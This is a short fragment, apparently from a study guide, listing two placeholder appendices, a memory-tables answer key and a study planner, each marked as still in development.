Appendix D. Memory Tables Answer Key
This content is currently in development.
Appendix E. Study Planner
This content is currently in development.